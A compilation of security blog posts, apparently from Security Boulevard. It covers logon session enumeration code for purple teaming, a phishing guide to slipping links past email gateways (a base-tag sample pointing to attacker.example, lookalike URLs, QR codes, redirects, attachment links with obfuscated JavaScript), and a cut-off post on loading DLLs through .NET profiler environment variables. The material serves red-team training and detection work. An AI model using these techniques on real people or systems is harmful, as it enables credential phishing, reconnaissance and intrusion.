
Phishing Attack Pentesting Guide

Phishing is probably one of the biggest issues for most organizations today. With network and endpoint defensive technology getting better and better, the bad guys aren’t trying to take the tough route and are instead going for the low-hanging fruit. Phishing is one of those issues where training the employees is your best […]

The post Phishing Attack Pentesting Guide was published first on CISO2CISO.COM & CYBER SECURITY GROUP.


Deconstructing Logon Session Enumeration

21 June 2024 at 14:18

Purple Teaming

How we define and create test cases for our purple team runbooks

Intro

In our purple team service, we take a depth-and-quality approach, running many functionally diverse test cases for a given technique. In this blog, I will describe our process of defining and implementing test cases for our purple team runbooks. The goal of this blog post is to give the community a bit more information about how we implement test cases for logon session enumeration, what the preventative controls might be, and how this process can be applied to other techniques.

Defining Unique Test Cases

We wanted to develop a logical numbering system to separate test cases for each technique. After a couple of iterations of our purple team service, we started to deliberately select test cases and run variations based on three distinct categories:

  1. Distinct Procedures: Jared defines this as “a sequence of operations that, when combined, implement a technique or sub-technique.” We attempt to deconstruct tools that implement the technique to find functional differences, whether that tool is open-source or a Microsoft binary. This can require reverse engineering or reviewing source code to reveal what the tool is doing under the hood. It also might involve writing or altering existing tooling to meet your needs. An example of this can be found in part 1 of Jared’s blog On Detection: Tactical to Functional, where he reviews the source code of Mimikatz’s sekurlsa::logonPasswords module. If the tool implements a unique set of operations in the call graph, then we define that as a distinct procedure.
  2. Execution Modality: We then alter the execution modality, which changes how the set of functions is implemented. This is outlined in part 12 of Jared’s blog On Detection: Tactical to Functional: “one tool that is built into the operating system (Built-in Console Application), a tool that had to be dropped to disk (Third-Party Console Application), a tool that could run in PowerShell’s memory (PowerShell Script), a tool that runs in the memory of an arbitrary process (Beacon Object File), and a tool that can run via a proxy without ever touching the subject endpoint (Direct RPC Request)”. This variation helps us determine whether running the same distinct procedure through a different execution mechanism (Beacon Object File, Unmanaged PowerShell, etc.), or implementing it in a different programming language (C, Python, PowerShell, etc.), alters whether your security controls detect or prevent it.
  3. Minor Variations: Finally, we introduce slight variations to alter the payload, target user, computer, or process depending on the technique we are working on. In the case of logon session enumeration, we alter local vs. remote logon sessions and the machine we are targeting (i.e., file server, workstation, etc). During purple team assessments, we often find ourselves using this variation based on the organization’s environmental factors. For other techniques, these environmental factors normally include choosing which account to Kerberoast or which process to inject into.

Defining test cases in this manner allows us to triangulate a technique’s coverage estimation rather than treat the techniques in the MITRE ATT&CK matrix as a bingo card where we run net session and net1 session, fill in the box for this technique, and move on to the next one. After running each test case during the purple team assessment, we look for whether the test case was prevented, detected, or observed (telemetry) by any security controls the organization may have.

Deconstructing Distinct Logon Session Enumeration Procedures

Let’s dive into logon session enumeration by deconstructing the functional differences between three distinct procedures. If you want to learn more (or want to apply this methodology yourself), you can find out more about the process we use to examine the function call stack of tools in Nathan’s Beyond Procedures: Digging into the Function Call Stack and Jared’s On Detection: Tactical to Functional series.

We can start by examining the three distinct procedures that SharpHound implements. Rohan blogged about the three different methods SharpHound uses. SharpHound can attempt to use all three depending on the context it’s running under and what arguments are passed to it. The implementation of each procedure can be found here: NetSessionEnum, NetWkstaEnum, and GetSubKeyNames in the SharpHoundCommon library. Matt also talks about this in his BOFHound: Session Integration blog.

Here is a breakdown of each of the three unique procedures implemented in SharpHound for remote session enumeration:

Distinct Procedure #1: Network Session Enumeration (NetSessionEnum)

NetSessionEnum is a Win32 API implemented in netapi32.dll. The image below shows where each tool is implemented in the function call stack:

NetSessionEnum Function Call Graph

This Win32 API returns a list of active remote or network logon sessions. These two blogs (Netwrix and Compass Security) go into detail about which operating systems allow “Authenticated Users” to query logon sessions, and how to check and restrict remote access to this API by altering the security descriptor in the HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity\SrvsvcSessionInfo registry key. If we read Microsoft’s documentation on the RPC server, we see the MS-SRVS RPC server is only implemented via the \PIPE\srvsvc named pipe (RPC servers can also commonly be implemented over TCP). As Microsoft’s documentation states, named pipes communicate over CIFS\SMB via port 445.
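To make the call concrete, here is a minimal sketch of invoking this API from Python via ctypes. The server name is a hypothetical placeholder; information level 10 returns SESSION_INFO_10 structures containing the client and user name for each session:

import ctypes
from ctypes import wintypes

class SESSION_INFO_10(ctypes.Structure):
    _fields_ = [
        ("sesi10_cname", wintypes.LPWSTR),     # computer the session came from
        ("sesi10_username", wintypes.LPWSTR),  # user who established the session
        ("sesi10_time", wintypes.DWORD),       # seconds the session has been active
        ("sesi10_idle_time", wintypes.DWORD),  # seconds the session has been idle
    ]

def enum_sessions(server):
    netapi32 = ctypes.WinDLL("netapi32")
    buf = ctypes.POINTER(SESSION_INFO_10)()
    entries = wintypes.DWORD(0)
    total = wintypes.DWORD(0)
    resume = wintypes.DWORD(0)
    # NetSessionEnum(servername, clientname, username, level, bufptr,
    #                prefmaxlen, entriesread, totalentries, resumehandle)
    status = netapi32.NetSessionEnum(
        server, None, None, 10, ctypes.byref(buf),
        0xFFFFFFFF,  # MAX_PREFERRED_LENGTH: let the server size the buffer
        ctypes.byref(entries), ctypes.byref(total), ctypes.byref(resume))
    if status != 0:
        raise OSError(f"NetSessionEnum failed with status {status}")
    try:
        for i in range(entries.value):
            print(f"{buf[i].sesi10_username} from {buf[i].sesi10_cname}")
    finally:
        netapi32.NetApiBufferFree(buf)  # free the buffer the server allocated

enum_sessions(r"\\FILESERVER01")  # hypothetical file server name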

In our purple team service, we usually target the organization’s most active file server for two reasons. First, port 445 (SMB) will generally be open from everywhere on the internal network for this server. Second, this server has the most value to an attacker since it could contain hundreds or even thousands of user-to-machine mappings an attacker could use for “user hunting.”

Distinct Procedure #2: Interactive, Service, and Batch Logon Session Enumeration (NetWkstaUserEnum)

NetWkstaUserEnum is also a Win32 API implemented in netapi32.dll. Below is the breakdown of the function call stack and where each tool is implemented:

NetWkstaUserEnum Function Call Graph

As Microsoft documentation says: “This list includes interactive, service, and batch logons” and “Members of the Administrators, and the Server, System, and Print Operator local groups can also view information.” This API call has different permission requirements and returns a different set of information than the NetSessionEnum API call; however, just like NetSessionEnum, the RPC server is implemented only via the \PIPE\wkssvc named pipe. Again, this blog from Compass Security goes into more detail about the requirements.
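As a sketch of how similar this procedure looks at the API level, here is a hedged ctypes variant (the workstation name is a placeholder; level 0 returns WKSTA_USER_INFO_0 structures holding just the username). Note the access-denied handling, since by default this call fails against machines where we hold no privileged rights:

import ctypes
from ctypes import wintypes

class WKSTA_USER_INFO_0(ctypes.Structure):
    _fields_ = [("wkui0_username", wintypes.LPWSTR)]  # logged-on user name

def enum_loggedon(server):
    netapi32 = ctypes.WinDLL("netapi32")
    buf = ctypes.POINTER(WKSTA_USER_INFO_0)()
    entries = wintypes.DWORD(0)
    total = wintypes.DWORD(0)
    resume = wintypes.DWORD(0)
    status = netapi32.NetWkstaUserEnum(
        server, 0, ctypes.byref(buf), 0xFFFFFFFF,
        ctypes.byref(entries), ctypes.byref(total), ctypes.byref(resume))
    if status == 5:  # ERROR_ACCESS_DENIED: we are not privileged on the target
        print("Access denied; did the attempt still generate telemetry?")
        return
    if status != 0:
        raise OSError(f"NetWkstaUserEnum failed with status {status}")
    try:
        for i in range(entries.value):
            # includes interactive, service, and batch logons
            print(buf[i].wkui0_username)
    finally:
        netapi32.NetApiBufferFree(buf)

enum_loggedon(r"\\WORKSTATION01")  # hypothetical machine where we are local admin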

Since this, by default, requires administrator or other privileged rights on the target machine, we will again attempt to target file servers and will usually get an access denied response when running this procedure. As detection engineers, we should ask: if someone attempts to enumerate sessions, do we have the telemetry even when they are unsuccessful? Next, we will target a workstation on which we do have administrator rights and enumerate sessions using this minor variation in a different test case.

Distinct Procedure #3: Interactive Session Enumeration (RegEnumKeyExW)

Note: I’m only showing the function call stack of RegEnumKeyExW; SharpHound calls OpenRemoteBaseKey to get a handle to the remote key before calling RegEnumKeyExW. I also left out calls to API sets in this graph.

RegEnumKeyExW is, again, a Win32 API implemented in advapi32.dll. Below is the breakdown of the function call stack and where each tool is implemented:

RegEnumKeyExW Function Call Graph

As Microsoft documentation says, the remote system “requires the Remote Registry service to be running on the remote computer.” Again, this blog from Compass Security goes into more detail about the requirements, but by default, the service is disabled on workstation operating systems like Windows 10 and 11, and set to trigger-start on server operating systems (the trigger being a connection to the \PIPE\winreg named pipe). If the Remote Registry service is running (or triggerable), the HKEY_USERS hive can be queried for a list of subkeys. These subkeys contain the SIDs of users who are interactively logged on. Like NetWkstaUserEnum and NetSessionEnum, the RPC server is implemented only via the \PIPE\winreg named pipe.
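Python’s standard winreg module wraps these same registry APIs, so a rough sketch of this procedure (hypothetical target name) looks like the following; each SID-named subkey under HKEY_USERS corresponds to a loaded user profile, i.e., an interactive logon:

import winreg

def enum_interactive(server):
    # connects through the Remote Registry service over \PIPE\winreg
    hive = winreg.ConnectRegistry(server, winreg.HKEY_USERS)
    try:
        i = 0
        while True:
            sid = winreg.EnumKey(hive, i)
            # keep domain/local account SIDs, skip the _Classes duplicates
            if sid.startswith("S-1-5-21-") and not sid.endswith("_Classes"):
                print(sid)
            i += 1
    except OSError:
        pass  # EnumKey raises OSError once the subkeys run out
    finally:
        winreg.CloseKey(hive)

enum_interactive(r"\\WORKSTATION01")  # hypothetical target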

Putting it all Together with Test Cases

Now that we have a diverse set of procedures and tooling examples that use a variety of execution modalities, we can start creating test cases to run for this technique. Below, I have included an example set of test cases and associated numbering system using each of the three distinct procedures and altering the execution modality for each one.

You can also find a full TOML runbook for the examples below here: https://ghst.ly/session-enumeration-runbook. All of the test cases are free or open source and can be executed via an Apollo agent with the Mythic C2 framework.

For example, our numbering looks like: Test Case X.Y.Z

  • X — Distinct Procedure
  • Y — Execution Modality
  • Z — Minor Variation

A sample set of test cases we might include:

Network Session Enumeration (NetSessionEnum)

  • Test Case 1.0.0 — Enumerate SMB Sessions From Third-Party Utility On Disk (NetSess)
  • Test Case 1.1.0 — Enumerate SMB Sessions via Beacon Object File (BOF) — get-netsession
  • Test Case 1.2.0 — Enumerate SMB Sessions via PowerView’s Get-NetSession
  • Test Case 1.3.0 — Enumerate SMB Sessions via Proxied RPC

Interactive, Service, and Batch Logon Session Enumeration (NetWkstaUserEnum)

  • Test Case 2.0.0 — Enumerate Interactive, Service, and Batch Logon Sessions from BOF (netloggedon) — Server
  • Test Case 2.0.1 — Enumerate Interactive, Service, and Batch Logon Sessions from BOF (netloggedon) — Workstation
  • Test Case 2.1.0 — Enumerate Interactive, Service, and Batch Logon Sessions from Impacket (netloggedon.py)
  • Test Case 2.2.0 — Enumerate Interactive, Service, and Batch Logon Sessions via PowerView’s Get-NetLoggedOn

Interactive Session Enumeration (RegEnumKeyExW)

  • Test Case 3.0.0 — Enumerate Interactive Sessions via reg_query BOF (Server)
  • Test Case 3.0.1 — Enumerate Interactive Logon Sessions via reg_query BOF (Workstation)
  • Test Case 3.1.0 — Enumerate Interactive Sessions from Impacket (reg.py)

After executing each test case, we can determine whether the test case was prevented, detected, or observed. Tracking information like this allows us to provide feedback on an organization’s controls and predict how likely they are to detect or prevent an adversary’s arbitrary selection of procedure or execution modality. Also, we space test cases about 10 minutes apart; name artifacts like files, registry keys, and processes after their corresponding test case number; and alternate the machine and source user we are executing from to make finding observable telemetry easier. We may include or exclude certain test cases based on the organization’s security controls. For example, if they block and alert on all powershell.exe usage, we aren’t going to run 40 test cases across multiple techniques that attempt to call the PowerShell binary.

Conclusion

By researching and deconstructing each tool and looking at the underlying function call stacks, we found that regardless of which distinct procedure or execution modality was used, the tools all relied on three different RPC servers, each implemented over a named pipe. This also allows us to triangulate detection coverage and helps determine whether a custom or vendor-based rule is looking for a brittle indicator or a tool-specific detail/toolmark.

We now have a fairly broad set of test cases for a runbook that accounts for a wide variety of attacker tradecraft for this technique. Knowing this as a blue teamer or detection engineer allows us to implement a much more comprehensive detection strategy for this particular technique around the three named pipes we discovered. This lets us write robust detection rules rather than looking for the string “Get-NetSession” in a PowerShell script. Would this produce a perfect detection for session enumeration? No. Does this include every single way an attacker can determine where a user is logged on? No. Does deconstructing adversary tradecraft in this manner vastly improve our coverage for the technique? Absolutely.

In my next post, I will cover many log sources native to Windows (I’m counting Sysmon as native) and a couple of EDRs that allow us to detect logon session enumeration via named pipes (or TCP in some cases). You might be familiar with some of these sources; others aren’t very well documented. Each of these log sources can be enabled and shipped to a centralized place like a SIEM. Each source has its own requirements, provides different context, and has its pros and cons for use in a detection rule.



Deconstructing Logon Session Enumeration was originally published in Posts By SpecterOps Team Members on Medium, where people are continuing the conversation by highlighting and responding to this story.

The post Deconstructing Logon Session Enumeration appeared first on Security Boulevard.

EU Aims to Ban Math — ‘Chat Control 2.0’ Law is Paused but not Stopped

20 June 2024 at 12:43
“Oh, won’t somebody please think of the children?”

Ongoing European Union quest to break end-to-end encryption (E2EE) mysteriously disappears.

The post EU Aims to Ban Math — ‘Chat Control 2.0’ Law is Paused but not Stopped appeared first on Security Boulevard.

Cybercriminals Target Trump Supporters with Donation Scams

18 June 2024 at 17:47
Trump donation scam

Donald Trump’s presidential campaign is known for aggressively trying to raise money, even sending emails to donors hoping to cash in on setbacks like his conviction late last month on 34 felony counts for illegally influencing the 2016 campaign. Bad actors now are trying to do the same, running donation scams by impersonating the campaign..

The post Cybercriminals Target Trump Supporters with Donation Scams appeared first on Security Boulevard.

Feeding the Phishes

18 June 2024 at 09:21

PHISHING SCHOOL

Bypassing Phishing Link Filters

You could have a solid pretext that slips right by your target secure email gateway (SEG); however, if your link looks too sketchy (or, you know, “smells phishy”), your phish could go belly-up before it even gets a bite. That’s why I tend to think of link filters as their own separate control. Let’s talk briefly about how these link filters work and then explore some ways we might be able to bypass them.

What the Filter? (WTF)

Over the past few years, I’ve noticed a growing interest in detecting phishing based on the links themselves–or, at least, there are several very popular SEGs that place a very high weight on the presence of a link in an email. I’ve seen so much of this that I have made this type of detection one of my first troubleshooting steps when a SEG blocks me. I’ll simply remove all links from an email and check if the message content gets through.

In at least one case, I encountered a SEG that blocked ANY email that contained a link to ANY unrecognized domain, no matter what the wording or subject line said. In this case, I believe my client was curating a list of allowed domains and instructed the SEG to block everything else. It’s an extreme measure, but I think it is a very valid concern. Emails with links are inherently riskier than emails that do not contain links; therefore, most modern SEGs will increase the SPAM score of any message that contains a link and often will apply additional scrutiny to the links themselves.

How Link Filters Work — Finding the Links

If a SEG filters links in an email, it first needs to detect/parse each link in the content. To do this, almost any experienced software engineer will reach straight for regular expressions (“regex” for short):

Stand back! I know regular expressions

To which, any other experienced software engineer will be quick to remind us that while regex is extremely powerful, it is also easy to screw up:

99 problems (and regex is one)

As an example, here are just a few of the top regex filters I found for parsing links on stackoverflow:

(http|ftp|https):\/\/([\w_-]+(?:(?:\.[\w_-]+)+))([\w.,@?^=%&:\/~+#-]*[\w@?^=%&\/~+#-])

(?:(?:https?|ftp|file):\/\/|www\.|ftp\.)(?:\([-A-Z0-9+&@#\/%=~_|$?!:,.]*\)|[-A-Z0-9+&@#\/%=~_|$?!:,.])*(?:\([-A-Z0-9+&@#\/%=~_|$?!:,.]*\)|[A-Z0-9+&@#\/%=~_|$])

(?:(?:https?|ftp):\/\/)?[\w/\-?=%.]+\.[\w/\-&?=%.]+

([\w+]+\:\/\/)?([\w\d-]+\.)*[\w-]+[\.\:]\w+([\/\?\=\&\#\.]?[\w-]+)*\/?

(?i)\b((?:[a-z][\w-]+:(?:/{1,3}|[a-z0-9%])|www\d{0,3}[.]|[a-z0-9.\-]+[.][a-z]{2,4}/)(?:[^\s()<>]+|\(([^\s()<>]+|(\([^\s()<>]+\)))*\))+(?:\(([^\s()<>]+|(\([^\s()<>]+\)))*\)|[^\s`!()\[\]{};:'".,<>?«»“”‘’]))

Don’t worry if you don’t know what any of these mean. I consider myself to be well versed in regex and even I have no opinion on which of these options would be better than the others. However, there are a couple things I would like to note from these examples:

  1. There is no “right” answer; URLs can be very complex
  2. Most (but not all) are looking for strings that start with “http” or something similar

These are also some of the most popular (think “smart people”) answers to this problem of parsing links. I could also imagine that some software engineers would take a more naive approach of searching for all anchor (“<a>”) HTML tags or looking for “href=” to indicate the start of a link. No matter which solution the software engineer chooses, there are likely going to be at least some valid URLs that their parser doesn’t catch and might leave room for a categorical bypass. We might also be able to evade parsers if we can avoid the common indicators like “http” or break up our link into multiple sections.

Side Note: Did you see that some of these popular URL parsers account for FTP and some don’t? Did you know that most browsers can connect to FTP shares? Have you ever tried to deliver a phishing payload over an anonymous FTP link?

How Link Filters Work — Filtering the Links

Once a SEG has parsed out all the links in an email, how should it determine which ones look legitimate and which ones don’t? Most SEGs these days look at two major factors for each link:

  1. The reputation of the domain
  2. How the link “looks”

Checking the domain reputation is pretty straightforward; you just split the link to see what’s between the first two forward slashes (“//”) and the next forward slash (“/”) and look up the resulting domain or subdomain on Virustotal or similar. Many SEGs will share intelligence on known bad domains with other security products and vice versa. If your domain has been flagged as malicious, the SEG will either block the email or remove the link.
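As a quick illustration of that split, Python’s standard urllib does the same job a SEG’s parser might (the URL is a hypothetical lookalike, the same one used as an example later in this post):

from urllib.parse import urlparse

link = "https://accounts.goooogle.com/login?id=34567"
domain = urlparse(link).netloc  # "accounts.goooogle.com"
# the SEG would then look up this domain on Virustotal or a similar feed
print(domain)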

As far as checking how the link “looks”, most SEGs these days use artificial intelligence or machine learning (i.e., AI/ML) to categorize links as malicious or benign. These AI models have been trained on a large volume of known-bad links and can detect themes and patterns commonly used by SPAM authors. As phishers, I think it’s important for us to focus on the “known-bad” part of that statement.

I’ve seen a talk in which one researcher claimed their AI model detected over 98% of malicious links in their training data. At first glance, this seems like a very impressive number; however, we need to keep in mind that in order to have a training set of malicious links in the first place, humans had to detect 100% of that set as malicious. Therefore, the AI model was only 98% as good as a human at detecting phishing links based solely on the “look” of the link. I would imagine it would do much worse on a set of unknown-bad links, if there were hypothetically a way to attain such a set. To slip through the cracks, we should aim to put our links in that unknown-bad category.

Even though we are up against AI models, I like to remind myself that these models can only be trained on human-curated data and therefore can only theoretically approach the competence of a human, but not surpass humans at this task. If we can make our links look convincing enough for a human, the AI should not give us any trouble.

Bypassing Link Filters

Given what we now know about how link filters work, we should have two main tactics available to us for bypassing the filter:

  1. Format our link so that it slips through the link parsing phase
  2. Make our link “look” more legitimate

If the parser doesn’t register our link as a link, then it can’t apply any additional scrutiny to the location. If we can make our link location look like some legitimate link, then even if we can’t bypass the parser, we might get the green light anyway. Please note that these approaches are not mutually exclusive and you might have greater success mixing techniques.

Bypassing the Parser

Don’t use an anchor tag

One of the most basic parser bypasses I have found for some SEGs is to simply leave the link URL in plaintext by removing the hyperlink in Outlook. Normally, link URLs are placed in the “hypertext reference” (href) attribute of an HTML anchor tag (<a>). As I mentioned earlier, one naive but surprisingly common solution for parsing links is to use an HTML parsing library like BeautifulSoup in Python. For example:

soup = BeautifulSoup(email.content, 'html.parser')
links = soup.find_all("a")  # find all anchor (<a>) elements
for link in links:
    print("Link:", link.get("href"), "Text:", link.string)

Any SEG that uses this approach to parse links won’t see a URL outside of an anchor tag. While a URL that is not a clickable link might look a little odd to the end user, it’s generally worth the tradeoff when this bypass works. In many cases, mail clients will parse and display URLs as hyperlinks even if they are not in an anchor tag; therefore, there is usually little to no downside of using this technique.

Use a Base Tag (a.k.a BaseStriker Attack)

One interesting method of bypassing some link filters is to use a little-known HTML tag called “base”. This tag allows you to set the base domain for any links that use relative references (i.e., links with hrefs that start with “/something” instead of direct references like “https://example.com/something”). In this case, the “https://example.com” would be considered the “base” of the URL. By defining the base using the HTML base tag in the header of the HTML content, you can then use just relative references in the body of the message. While HTML headers frequently contain URLs for things like CSS or XML schemas, the header is usually not expected to contain anything malicious and may be overlooked by a link parser. This technique is known as the “BaseStriker” attack and has been known to work against some very popular SEGs:

https://www.cyberdefensemagazine.com/basestriker-attack-technique-allow-to-bypass-microsoft-office-365-anti-phishing-filter/

The reason why this technique works is because you essentially break your link into two pieces: the domain is in the HTML headers, and the rest of the URL is in your anchor tags in the body. Because the hrefs for the anchor tags don’t start with “https://” they aren’t detected as links.
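A minimal sketch of what such an email body might look like (the attacker domain is a placeholder):

<html>
  <head>
    <!-- the domain lives up here, in a header tag parsers rarely scrutinize -->
    <base href="https://attacker.example">
  </head>
  <body>
    <!-- no scheme, no domain: many regex parsers will not flag this as a link -->
    <a href="/login/reset">Reset your password</a>
  </body>
</html>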

Scheming Little Bypasses

The first part of a URL, before the colon and forward slashes, is what’s known as the “scheme”:

URI = scheme ":" ["//" authority] path ["?" query] ["#" fragment]

As mentioned earlier, some of the more robust ways to detect URLs are to look for anything that looks like a scheme (e.g., “http://” or “https://”), followed by a sequence of characters that would be allowed in a URL. If we simply leave off the scheme, many link parsers will not be able to detect our URL, but it will still look like a URL to a human:

accounts.goooogle.com/login?id=34567

A human might easily be convinced to simply copy and paste this link into their browser for us. In addition, there are quite a few legitimate schemes that could open a program on our target user’s system and potentially slip through a URL parser that is only looking for web links:

https://en.wikipedia.org/wiki/List_of_URI_schemes

There are at least a few that could be very useful as phishing links ;)

QR Phishing

What if there isn’t a link in the email at all? What if it’s an image instead? You can use a tool like SquarePhish to automate phishing with QR codes instead of traditional links:

GitHub - secureworks/squarephish

I haven’t played with this yet, but have heard good things from friends that have used similar techniques. If you want to play with automating this attack yourself, NodeJS has a simple library for generating QRs:

qrcode
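(For what it’s worth, Python has an equally simple package, also named qrcode. A minimal sketch, reusing the made-up URL from earlier; it needs pip install qrcode[pil]:)

import qrcode

img = qrcode.make("https://accounts.goooogle.com/login?id=34567")  # phishing URL
img.save("invoice_qr.png")  # embed this image in the email instead of a link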

Bypassing the Filter

Don’t Mask

(Hold on. I need to get on my soapbox…) I can’t count how many times I’ve been blocked because of a masked link only to find that unmasking the link would get the same pretext through. I think this is because spammers have thoroughly abused this feature of anchor tags in the past and average email users seldom use masked links. Link filters tend to see masked links as far more dangerous than regular links; therefore, just use a regular link. It seems like everyone these days knows how to hover a link and check its real location anyway, so masked links are even bad at tricking humans now. Don’t be cliche. Don’t use masked links.

Use Categorized Domains

Many link filters block or remove links to domains that are either uncategorized, categorized as malicious, or were recently registered. Therefore, it’s generally a good idea to use domains that have been parked long enough to be categorized. We’ve already touched on this in “One Phish Two Phish, Red Teams Spew Phish”, so I’ll skip the process of getting a good domain; however, just know that the same rules apply here.

Use “Legitimate” Domains

If you don’t want to go through all the trouble of maintaining categorized domains for phishing links, there are some generally trustworthy domains you can leverage instead. One example I recently saw “in-the-wild” was a spammer using a sites.google.com link. They just hosted their phishing page on Google! I thought this was brilliant because I would expect most link filters to allow Google, and even most end users would think anything on google.com must be legit. Some other similar examples would be hosting your phishing sites as static pages on GitHub, in an S3 bucket, other common content delivery networks (CDNs), or on SharePoint, etc. There are tons of seemingly “legitimate” sites that allow users to host pages of arbitrary HTML content.

Arbitrary Redirects

Along the same lines as hosting your phishing site on a trusted domain is using trusted domains to redirect to your phishing site. One classic example of this would be link shorteners like TinyURL. While TinyURL has been abused for SPAM to the point that I would expect most SEGs to block TinyURL links, it does demonstrate the usefulness of arbitrary redirects.

A more useful form of arbitrary redirect for bypassing link filters is a URL with either a cross-site scripting (XSS) vulnerability that allows us to specify a ‘window.location’ change, or an HTTP GET parameter specifying where the page should redirect. As part of my reconnaissance phase, I like to spend at least a few minutes on my target’s main website looking for these types of vulnerabilities. They are surprisingly common, and while an arbitrary redirect might be considered a low-risk finding on a web application penetration test report, they can be extremely useful when combined with phishing. Your links will point to a URL on your target organization’s main website, and it is extremely unlikely that a link filter, or even a human, will see the danger. In some cases, you may find that your target organization has configured an explicit allow list in the SEG for links that point to their own domains.

Link to an Attachment

Did you know that links in an email can also point to an email attachment? Instead of providing a URL in the href of your anchor tag, you can specify the content identifier (CID) of the attachment (e.g. href="cid:mycontentidentifier@content.net"). One way I have used this trick to bypass link filters is to link to an HTML attachment and use obfuscated JavaScript to redirect the user to the phishing site. Because our href does not look like a URL, most SEGs will think our link is benign. You could also link to a PDF, DOCX, or several other usually allowed file types that then contain the real phishing link. This might require a little more setup in your pretext to instruct the user, or you can just hope that they will click the link after opening the document. In this case, I think it makes the most sense to add any additional instructions inside the document, where the contents are less likely to be scrutinized by the SEG’s content filter.
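A sketch of what that anchor might look like in the email body, with a made-up content identifier matching an attached HTML file:

<!-- the href is a Content-ID reference, not a URL, so there is nothing
     for a URL parser to extract -->
<a href="cid:invoice2024@corp.example">View your invoice</a>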

Pick Up The Phone

This blog rounds out our “message inbound” controls that we have to bypass for social engineering pretexts. It would not be complete without mentioning one of the simplest bypasses of them all:

Not using email!

If you pick up the phone and talk directly to your target, your pretext travels from your mouth, through the phone, then directly into their ear, and hits their brain without ever passing through a content or reputation filter.

Along the same lines, Zoom calls, Teams chats, LinkedIn messaging, and just about any other common business communication channel will likely be subject to far fewer controls than email. I’ve trained quite a few red teamers who prefer phone calls over emails because it greatly simplifies their workflow. Just a few awkward calls is usually all it takes to gain access to a target environment.

More interactive forms of communication, like phone calls, also allow you to gauge how the target is feeling about your pretext in real time. It’s usually obvious within seconds whether someone believes you and wants to help or if they think you’re full of it and it’s time to cut your losses, hang up the phone, and try someone else. You can also use phone calls as a way to prime a target for a follow-up email to add perceived legitimacy. Getting our message to the user is half the battle, and social engineering phone calls can be a powerful shortcut.

In Summary

If you need to bypass a link filter, either:

  1. Make your link look like it’s not a link
  2. Make your link look like a “legitimate” link

People still use links in emails all the time. You just need to blend in with the “real” ones and you can trick the filter. If you are really in a pinch, just call your targets instead. It feels more personal, but it gets the job done quickly.


Feeding the Phishes was originally published in Posts By SpecterOps Team Members on Medium, where people are continuing the conversation by highlighting and responding to this story.

The post Feeding the Phishes appeared first on Security Boulevard.

Netcraft Uses Its AI Platform to Trick and Track Online Scammers

13 June 2024 at 14:00
romance scams generative AI pig butchering

At the RSA Conference last month, Netcraft introduced a generative AI-powered platform designed to interact with cybercriminals to gain insights into the operations of the conversational scams they’re running and disrupt their attacks. At the time, Ryan Woodley, CEO of the London-based company that offers a range of services from phishing detection to brand, domain,..

The post Netcraft Uses Its AI Platform to Trick and Track Online Scammers appeared first on Security Boulevard.

Tile/Life360 Breach: ‘Millions’ of Users’ Data at Risk

13 June 2024 at 13:28
Life360 CEO Chris Hulls

Location tracking service leaks PII, because—incompetence? Seems almost TOO easy.

The post Tile/Life360 Breach: ‘Millions’ of Users’ Data at Risk appeared first on Security Boulevard.

Streamlining CLI Authentication: Implementing OAuth Login in Python

By: Guardians
12 June 2024 at 11:43

When building an application that requires user authentication, implementing a secure login flow is critical. In this article, we'll walk through how we created a robust OAuth login flow for ggshield, our Python-based command line tool, to streamline the onboarding process for our users.

The post Streamlining CLI Authentication: Implementing OAuth Login in Python appeared first on Security Boulevard.

Lateral Movement with the .NET Profiler

11 June 2024 at 12:35

Lateral Movement with the .NET Profiler

The accompanying code for this blog post can be found HERE.

Intro

I spend a lot of my free time modding Unity games. Since Unity is written in C#, the games are very easy to work with compared to those that compile to unmanaged code. This makes it a perfect hobby project to pick up and set down without getting too sweaty.

As I got deeper into modding C# games, I realized that hooking functions is actually slightly more complicated than it is in unmanaged programs, which is counterintuitive because just about everything else is much, much easier.

For unmanaged code, hooking functions is relatively straightforward. The basic steps are:

  • Allocate some memory to house the code you want to run when a function is called and write your instructions there
  • Overwrite the beginning of the original function’s instructions to jump to your new code
  • Handle all the fiddly details necessary to ensure that the program’s execution gets back to the original function and that the stack isn’t sloppy joe meat by the end of it

With .NET and Mono, it isn’t as simple. .NET assemblies’ functions are made up of a binary instruction set known as the Common Intermediate Language (CIL) that gets just-in-time (JIT) compiled to machine instructions at runtime by the Common Language Runtime (CLR).

The main issue with attempting to hook managed code is that by the time you inject into the target process, the function you want to hook may have already been JIT’ed, and if so, the CLR has cached the x86 instructions it was translated into. If you modify the CIL bytecode and the function gets called again, the CLR may just execute the cached x86 instructions that were compiled before your modifications. In addition to this issue, there are myriad little corner cases that make this a big headache. (Although in reality, this is a solved problem. There have been many great solutions and frameworks built to make this easy for developers, such as Harmony and MonoMod, but I was still curious to learn more about it.)

.NET Profilers

In my googling for hooking solutions, I came across Microsoft’s .NET profiling API, which wasn’t that helpful for my modding needs, but it did seem to have some handy primitives for red teaming! It is designed to allow for instrumentation of .NET processes by implementing a callback interface in an unmanaged COM server DLL that gets loaded into a given .NET process.

The CLR then calls functions from the interface when different events happen during execution. For pretty much anything that goes on in the CLR, you can implement a callback that gets called to inspect and manipulate behavior at runtime, such as when assemblies and modules are loaded, when functions are JIT compiled, and much more. Just look at all these callbacks, and this isn’t even all of them!

.NET Profiling API Callbacks

For more information about the basics of how these profilers work, I recommend watching this talk by Pavel Yosifovich. It was far and away the most valuable resource I found.


The Offensive Value of the .NET Profiler

Execution and Persistence:

Upon execution, the CLR for a given process examines the environment variables for three specific variables that cause a profiling DLL to be loaded:

Profiler-Specific Environment Variables
  • COR_ENABLE_PROFILING — This is a flag that enables profiling for the given process if set to 1, meaning the profiler DLL will be loaded into the process
  • COR_PROFILER — This is the CLSID that will be handed to the profiler DLL to see if it is the correct COM server. The profiler DLL can choose not to check this though and load no matter what this CLSID is
  • COR_PROFILER_PATH — The path to the profiler DLL that will be loaded

If all of these variables are present, profiling is enabled, and the DLL exists on disk, the profiler DLL will be loaded into the process at the start of execution. This gives us a pretty nice code execution primitive to load a DLL into an arbitrary .NET process.
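As a hedged local sketch of this primitive (the CLSID and DLL path are arbitrary placeholders), setting the three variables and spawning any .NET process is enough to get the DLL loaded:

import os
import subprocess

env = os.environ.copy()
env["COR_ENABLE_PROFILING"] = "1"  # turn profiling on for the child process
env["COR_PROFILER"] = "{cf0d821e-299b-5307-a3d8-b283c03916db}"  # placeholder CLSID
env["COR_PROFILER_PATH"] = r"C:\temp\profiler.dll"  # placeholder profiler DLL

# powershell.exe hosts the CLR, so the CLR will honor the profiler variables
subprocess.Popen(["powershell.exe", "-NoProfile"], env=env)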

